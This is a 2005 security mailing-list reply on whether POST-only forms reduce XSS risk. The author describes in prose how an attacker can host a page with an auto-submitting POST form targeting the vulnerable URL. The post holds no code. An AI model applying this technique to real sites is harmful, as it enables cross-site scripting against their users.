WebApp Sec mailing list archives
Re: GET and POST Methods Accepted
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Thu, 13 Oct 2005 10:57:33 +0200
On 12 Oct 2005 at 15:04, Welsh, Ed wrote: If the site will accept the GET method for
form data and is vulnerable to XSS, the attack surface greatly increases over a site that is vulnerable to XSS but only accepts the POST method. POST is still attackable, but it becomes more complicated than simply emailing a link.
An attacker can email a link to his/her own website/page, and this specially crafted page can contain a form (with method=POST and action being the vulnerable URL) followed by a piece of Javascript that submits this form. So XSS on POST method URLs isn't much more complicated than XSS on GET URLs. -Amit
Current thread:
- GET and POST Methods Accepted Welsh, Ed (Oct 12)
- Re: GET and POST Methods Accepted Joe Teff (Oct 12)
- Re: GET and POST Methods Accepted christopher baus (Oct 12)
- Re: GET and POST Methods Accepted Stephen de Vries (Oct 13)
- Re: GET and POST Methods Accepted christopher baus (Oct 13)
- Re: GET and POST Methods Accepted Stephen de Vries (Oct 13)
- Re: GET and POST Methods Accepted Damien Watson (Oct 13)
- Re: GET and POST Methods Accepted Serg Belokamen (Oct 13)
- Re: GET and POST Methods Accepted Eoin Keary (Oct 13)
- Re: GET and POST Methods Accepted Amit Klein (AKsecurity) (Oct 13)
- Re: GET and POST Methods Accepted John GALLET (Oct 13)
- Re: GET and POST Methods Accepted Eoin Keary (Oct 13)
- Re: GET and POST Methods Accepted John GALLET (Oct 13)
- Re: GET and POST Methods Accepted Eoin Keary (Oct 13)
- Re: GET and POST Methods Accepted Paul Laudanski (Oct 18)
- <Possible follow-ups>
- RE: GET and POST Methods Accepted Derick Anderson (Oct 13)
- RE: GET and POST Methods Accepted christopher baus (Oct 13)
- RE: GET and POST Methods Accepted Joe Teff (Oct 13)
- RE: GET and POST Methods Accepted christopher baus (Oct 13)
- RE: GET and POST Methods Accepted Derick Anderson (Oct 14)